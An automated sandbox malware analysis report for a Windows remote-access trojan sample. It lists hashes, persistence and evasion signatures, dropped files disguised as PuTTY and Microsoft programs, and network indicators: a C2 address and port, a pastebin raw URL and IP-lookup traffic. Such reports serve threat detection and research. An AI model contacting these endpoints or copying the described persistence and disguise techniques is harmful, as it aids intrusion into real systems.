Windows Analysis Report
ptKNiAaGus.exe

Overview

General Information

Sample name:	ptKNiAaGus.exe
Analysis ID:	1466956
MD5:	4410af8bec1266d76029f9bb042c6a73
SHA1:	632a7eadf55f09d8ba0d9641ae1adaa921aaf5fa
SHA256:	04783068a4bc4ce6a3f2e8ed35d40528b84ddb9c1a0ad2f39fb5634eb5f8295a
Infos:

Detection

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for dropped file

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

.NET source code contains potential unpacker

.NET source code references suspicious native API functions

Allows loading of unsigned dll using appinit_dll

Bypasses PowerShell execution policy

Connects to a pastebin service (likely for C&C)

Creates an undocumented autostart registry key

Creates multiple autostart registry keys

Drops PE files to the user root directory

Drops large PE files

Machine Learning detection for dropped file

Machine Learning detection for sample

Queries memory information (via WMI often done to detect virtual machines)

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Sigma detected: Suspicious Script Execution From Temp Folder

Suspicious powershell command line found

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Uses schtasks.exe or at.exe to add and modify task schedules

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to call native functions

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Drops PE files to the user directory

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE file contains strange resources

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: CurrentVersion NT Autorun Keys Modification

Sigma detected: Suspicious Schtasks From Env Var Folder

Stores large binary data to the registry

Too many similar processes found

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Classification

Signatures

AV Detection

Antivirus detection for dropped file

Source: C:\Users\user\Videos\xdwdMicrosoft PowerPoint Host.exe	Avira: detection malicious, Label: TR/Crypt.OPACK.Gen
Source: C:\Users\user\xdwdPutty.exe	Avira: detection malicious, Label: TR/Crypt.OPACK.Gen

Multi AV Scanner detection for submitted file

Source: ptKNiAaGus.exe

ReversingLabs: Detection: 83%

Machine Learning detection for dropped file

Source: C:\Users\user\Videos\xdwdPutty.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: ptKNiAaGus.exe

Joe Sandbox ML: detected

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.11.20:49734 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.11.20:49742 version: TLS 1.0

Source: ptKNiAaGus.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:

Binary string: C:\Users\Malware\Desktop\hack tool\Backdoor\Sheet rat v 2.2\Src\Plugins\SendFile\obj\Release\SendFile.pdb source: ptKNiAaGus.exe, 00000000.00000002.3335122785.000000001BAD0000.00000004.08000000.00040000.00000000.sdmp

Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2851746 ETPRO TROJAN MSIL/TrojanDownloader.Small.CUV Variant Checkin 192.168.11.20:49740 -> 147.185.221.18:44998
Source: Traffic	Snort IDS: 2851746 ETPRO TROJAN MSIL/TrojanDownloader.Small.CUV Variant Checkin 192.168.11.20:49741 -> 147.185.221.18:44998
Source: Traffic	Snort IDS: 2851746 ETPRO TROJAN MSIL/TrojanDownloader.Small.CUV Variant Checkin 192.168.11.20:49745 -> 147.185.221.18:44998

Connects to a pastebin service (likely for C&C)

Source: unknown	DNS query: name: pastebin.com
Source: unknown	DNS query: name: pastebin.com

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.11.20:49735 -> 147.185.221.18:44998

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /raw/LmbvnzZM HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/LmbvnzZM HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 104.20.3.235 104.20.3.235
Source: Joe Sandbox View	IP Address: 104.16.185.241 104.16.185.241
Source: Joe Sandbox View	IP Address: 147.185.221.18 147.185.221.18

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: SALSGIVERUS SALSGIVERUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad

May check the online IP address of the machine

Source: unknown	DNS query: name: icanhazip.com
Source: unknown	DNS query: name: icanhazip.com

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.11.20:49734 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.11.20:49742 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /raw/LmbvnzZM HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/LmbvnzZM HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: pastebin.com
Source: global traffic	DNS traffic detected: DNS query: q-policies.gl.at.ply.gg
Source: global traffic	DNS traffic detected: DNS query: icanhazip.com

Source: ptKNiAaGus.exe, 00000000.00000002.3335405088.000000001BD65000.00000004.00000020.00020000.00000000.sdmp, pto2q1ow.nf5.exe, 00000013.00000002.3348366187.000000001C010000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: ptKNiAaGus.exe, 00000000.00000002.3335405088.000000001BD65000.00000004.00000020.00020000.00000000.sdmp, pto2q1ow.nf5.exe, 00000013.00000002.3348366187.000000001C010000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: ptKNiAaGus.exe, 00000000.00000002.3320097217.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000011.00000002.1178226868.0000000003614000.00000004.00000800.00020000.00000000.sdmp, pto2q1ow.nf5.exe, 00000013.00000002.3321917309.0000000002F11000.00000004.00000800.00020000.00000000.sdmp, z4wwumki.3zg.exe, 00000021.00000002.1177243565.000000000338B000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000024.00000002.1193660323.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000032.00000002.1261787047.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000037.00000002.1289535355.0000000002FDE000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000040.00000002.1341509279.000000000292B000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 0000004E.00000002.1367682392.000000000276B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: ptKNiAaGus.exe, 00000000.00000002.3335405088.000000001BD65000.00000004.00000020.00020000.00000000.sdmp, pto2q1ow.nf5.exe, 00000013.00000002.3348366187.000000001C010000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.quovadis.bm0
Source: xdwdMicrosoft Paint.exe, 00000011.00000002.1199190845.000000001C0A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/odirm=C:
Source: pto2q1ow.nf5.exe, 00000013.00000002.3348366187.000000001C010000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ocsp.quovadi
Source: ptKNiAaGus.exe, 00000000.00000002.3335405088.000000001BD65000.00000004.00000020.00020000.00000000.sdmp, pto2q1ow.nf5.exe, 00000013.00000002.3348366187.000000001C010000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: xdwdMicrosoft Paint.exe, 00000011.00000002.1178226868.0000000003614000.00000004.00000800.00020000.00000000.sdmp, z4wwumki.3zg.exe, 00000021.00000002.1177243565.000000000338B000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000024.00000002.1193660323.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000032.00000002.1261787047.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000037.00000002.1289535355.0000000003007000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000040.00000002.1341509279.0000000002945000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 0000004E.00000002.1367682392.0000000002787000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.c
Source: xdwdMicrosoft Paint.exe, 00000011.00000002.1178226868.0000000003614000.00000004.00000800.00020000.00000000.sdmp, z4wwumki.3zg.exe, 00000021.00000002.1177243565.000000000338B000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000024.00000002.1193660323.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000032.00000002.1261787047.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000037.00000002.1289535355.0000000003007000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000040.00000002.1341509279.0000000002945000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 0000004E.00000002.1367682392.0000000002787000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.co
Source: xdwdMicrosoft Paint.exe, 00000011.00000002.1178226868.0000000003614000.00000004.00000800.00020000.00000000.sdmp, z4wwumki.3zg.exe, 00000021.00000002.1177243565.000000000338B000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000024.00000002.1193660323.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000032.00000002.1261787047.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000037.00000002.1289535355.0000000003007000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000040.00000002.1341509279.0000000002945000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 0000004E.00000002.1367682392.0000000002787000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com
Source: xdwdMicrosoft Paint.exe, 00000011.00000002.1178226868.0000000003614000.00000004.00000800.00020000.00000000.sdmp, z4wwumki.3zg.exe, 00000021.00000002.1177243565.000000000338B000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000024.00000002.1193660323.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000032.00000002.1261787047.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000037.00000002.1289535355.0000000003007000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000040.00000002.1341509279.0000000002945000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 0000004E.00000002.1367682392.0000000002787000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/
Source: xdwdMicrosoft Paint.exe, 00000011.00000002.1178226868.0000000003614000.00000004.00000800.00020000.00000000.sdmp, z4wwumki.3zg.exe, 00000021.00000002.1177243565.000000000338B000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000024.00000002.1193660323.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000032.00000002.1261787047.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000037.00000002.1289535355.0000000003007000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000040.00000002.1341509279.0000000002945000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 0000004E.00000002.1367682392.0000000002787000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/r
Source: xdwdMicrosoft Paint.exe, 00000011.00000002.1178226868.0000000003614000.00000004.00000800.00020000.00000000.sdmp, z4wwumki.3zg.exe, 00000021.00000002.1177243565.000000000338B000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000024.00000002.1193660323.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000032.00000002.1261787047.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000037.00000002.1289535355.0000000003007000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000040.00000002.1341509279.0000000002945000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/ra
Source: xdwdMicrosoft Paint.exe, 00000011.00000002.1178226868.0000000003614000.00000004.00000800.00020000.00000000.sdmp, z4wwumki.3zg.exe, 00000021.00000002.1177243565.000000000338B000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000024.00000002.1193660323.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000032.00000002.1261787047.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000037.00000002.1289535355.0000000003007000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000040.00000002.1341509279.0000000002945000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw
Source: xdwdMicrosoft Paint.exe, 00000011.00000002.1178226868.0000000003614000.00000004.00000800.00020000.00000000.sdmp, z4wwumki.3zg.exe, 00000021.00000002.1177243565.000000000338B000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000024.00000002.1193660323.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000032.00000002.1261787047.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000037.00000002.1289535355.0000000003007000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000040.00000002.1341509279.0000000002945000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/
Source: xdwdMicrosoft Paint.exe, 00000011.00000002.1178226868.0000000003614000.00000004.00000800.00020000.00000000.sdmp, z4wwumki.3zg.exe, 00000021.00000002.1177243565.000000000338B000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000024.00000002.1193660323.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000032.00000002.1261787047.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000037.00000002.1289535355.0000000003007000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000040.00000002.1341509279.0000000002945000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/L
Source: xdwdMicrosoft Paint.exe, 00000011.00000002.1178226868.0000000003614000.00000004.00000800.00020000.00000000.sdmp, z4wwumki.3zg.exe, 00000021.00000002.1177243565.000000000338B000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000024.00000002.1193660323.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000032.00000002.1261787047.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000037.00000002.1289535355.0000000003007000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000040.00000002.1341509279.0000000002945000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/Lm
Source: xdwdMicrosoft Paint.exe, 00000011.00000002.1178226868.0000000003614000.00000004.00000800.00020000.00000000.sdmp, z4wwumki.3zg.exe, 00000021.00000002.1177243565.000000000338B000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000024.00000002.1193660323.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000032.00000002.1261787047.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000037.00000002.1289535355.0000000003007000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000040.00000002.1341509279.0000000002945000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/Lmb
Source: xdwdMicrosoft Paint.exe, 00000011.00000002.1178226868.0000000003614000.00000004.00000800.00020000.00000000.sdmp, z4wwumki.3zg.exe, 00000021.00000002.1177243565.000000000338B000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000024.00000002.1193660323.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000032.00000002.1261787047.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000037.00000002.1289535355.0000000003007000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000040.00000002.1341509279.0000000002945000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/Lmbv
Source: xdwdMicrosoft Paint.exe, 00000011.00000002.1178226868.0000000003614000.00000004.00000800.00020000.00000000.sdmp, z4wwumki.3zg.exe, 00000021.00000002.1177243565.000000000338B000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000024.00000002.1193660323.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000032.00000002.1261787047.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000037.00000002.1289535355.0000000003007000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000040.00000002.1341509279.0000000002945000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/Lmbvn
Source: xdwdMicrosoft Paint.exe, 00000011.00000002.1178226868.0000000003614000.00000004.00000800.00020000.00000000.sdmp, z4wwumki.3zg.exe, 00000021.00000002.1177243565.000000000338B000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000024.00000002.1193660323.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000032.00000002.1261787047.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000037.00000002.1289535355.0000000003007000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000040.00000002.1341509279.0000000002945000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/Lmbvnz
Source: xdwdMicrosoft Paint.exe, 00000011.00000002.1178226868.0000000003614000.00000004.00000800.00020000.00000000.sdmp, z4wwumki.3zg.exe, 00000021.00000002.1177243565.000000000338B000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000024.00000002.1193660323.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000032.00000002.1261787047.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000037.00000002.1289535355.0000000003007000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000040.00000002.1341509279.0000000002945000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/LmbvnzZ
Source: ptKNiAaGus.exe, 00000000.00000002.3320097217.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000011.00000002.1178226868.0000000003614000.00000004.00000800.00020000.00000000.sdmp, pto2q1ow.nf5.exe, 00000013.00000002.3321917309.0000000002F11000.00000004.00000800.00020000.00000000.sdmp, z4wwumki.3zg.exe, 00000021.00000002.1177243565.000000000338B000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000024.00000002.1193660323.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000032.00000002.1261787047.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000037.00000002.1289535355.0000000003007000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000040.00000002.1341509279.0000000002945000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/LmbvnzZM

Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734

Too many similar processes found

Source: cmd.exe

Process created: 46

System Summary

Drops large PE files

Source: C:\Users\user\Desktop\ptKNiAaGus.exe	File dump: xdwdPutty.exe.0.dr 740754944			Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	File dump: xdwdMicrosoft PowerPoint Host.exe.19.dr 739685376			Jump to dropped file

Contains functionality to call native functions

Source: C:\Users\user\Desktop\ptKNiAaGus.exe

Code function: 0_2_00007FFF60F60F3F NtProtectVirtualMemory,

0_2_00007FFF60F60F3F

Creates files inside the system directory

Source: C:\Users\user\Desktop\ptKNiAaGus.exe

File created: C:\Windows\xdwd.dll

Jump to behavior

Detected potential crypto function

Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Code function: 0_2_00007FFF60F5B8C0	0_2_00007FFF60F5B8C0
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Code function: 0_2_00007FFF60F663B6	0_2_00007FFF60F663B6
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Code function: 0_2_00007FFF60F5C012	0_2_00007FFF60F5C012
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Code function: 0_2_00007FFF60F5CE70	0_2_00007FFF60F5CE70
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Code function: 17_2_00007FFF60F5996B	17_2_00007FFF60F5996B
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Code function: 17_2_00007FFF60F5B8C0	17_2_00007FFF60F5B8C0
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Code function: 17_2_00007FFF60F5CB20	17_2_00007FFF60F5CB20
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Code function: 17_2_00007FFF60F5C012	17_2_00007FFF60F5C012
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Code function: 19_2_00007FFF60F74520	19_2_00007FFF60F74520
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Code function: 19_2_00007FFF60F620D0	19_2_00007FFF60F620D0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Code function: 19_2_00007FFF60F69369	19_2_00007FFF60F69369
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Code function: 19_2_00007FFF60F615C8	19_2_00007FFF60F615C8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Code function: 19_2_00007FFF60F6A438	19_2_00007FFF60F6A438
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Code function: 19_2_00007FFF60F6B862	19_2_00007FFF60F6B862
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Code function: 19_2_00007FFF60F613F9	19_2_00007FFF60F613F9
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Code function: 33_2_00007FFF60F421D9	33_2_00007FFF60F421D9
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Code function: 33_2_00007FFF60F4E470	33_2_00007FFF60F4E470
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Code function: 33_2_00007FFF60F4DC85	33_2_00007FFF60F4DC85
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Code function: 33_2_00007FFF60F49369	33_2_00007FFF60F49369
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Code function: 33_2_00007FFF60F41320	33_2_00007FFF60F41320
Source: C:\Users\user\xdwdPutty.exe	Code function: 36_2_00007FFF60F4996B	36_2_00007FFF60F4996B
Source: C:\Users\user\xdwdPutty.exe	Code function: 36_2_00007FFF60F4B875	36_2_00007FFF60F4B875
Source: C:\Users\user\xdwdPutty.exe	Code function: 36_2_00007FFF60F4CB29	36_2_00007FFF60F4CB29
Source: C:\Users\user\xdwdPutty.exe	Code function: 36_2_00007FFF60F4C012	36_2_00007FFF60F4C012
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Code function: 50_2_00007FFF60F2B8C0	50_2_00007FFF60F2B8C0
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Code function: 50_2_00007FFF60F2C012	50_2_00007FFF60F2C012
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Code function: 50_2_00007FFF60F29818	50_2_00007FFF60F29818
Source: C:\Users\user\xdwdPutty.exe	Code function: 55_2_00007FFF60F5CB29	55_2_00007FFF60F5CB29
Source: C:\Users\user\xdwdPutty.exe	Code function: 55_2_00007FFF60F5C012	55_2_00007FFF60F5C012
Source: C:\Users\user\xdwdPutty.exe	Code function: 55_2_00007FFF60F5B8C0	55_2_00007FFF60F5B8C0
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Code function: 64_2_00007FFF60F699A8	64_2_00007FFF60F699A8
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Code function: 64_2_00007FFF60F6B875	64_2_00007FFF60F6B875
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Code function: 64_2_00007FFF60F612D0	64_2_00007FFF60F612D0
Source: C:\Users\user\xdwdPutty.exe	Code function: 78_2_00007FFF60F399A8	78_2_00007FFF60F399A8
Source: C:\Users\user\xdwdPutty.exe	Code function: 78_2_00007FFF60F3B8C0	78_2_00007FFF60F3B8C0
Source: C:\Users\user\xdwdPutty.exe	Code function: 78_2_00007FFF60F3C012	78_2_00007FFF60F3C012

PE file contains strange resources

Source: ptKNiAaGus.exe	Static PE information: Resource name: RT_VERSION type: MacBinary, comment length 97, char. code 0x69, total length 1711304448, Wed Mar 28 22:22:24 2040 INVALID date, modified Tue Feb 7 01:41:58 2040, creator ' ' "4"
Source: xdwdPutty.exe.0.dr	Static PE information: Resource name: RT_VERSION type: MacBinary, comment length 97, char. code 0x69, total length 1711304448, Wed Mar 28 22:22:24 2040 INVALID date, modified Tue Feb 7 01:41:58 2040, creator ' ' "4"

Sample file is different than original file name gathered from version info

Source: ptKNiAaGus.exe, 00000000.00000002.3335122785.000000001BAD0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameSendFile.dll2 vs ptKNiAaGus.exe
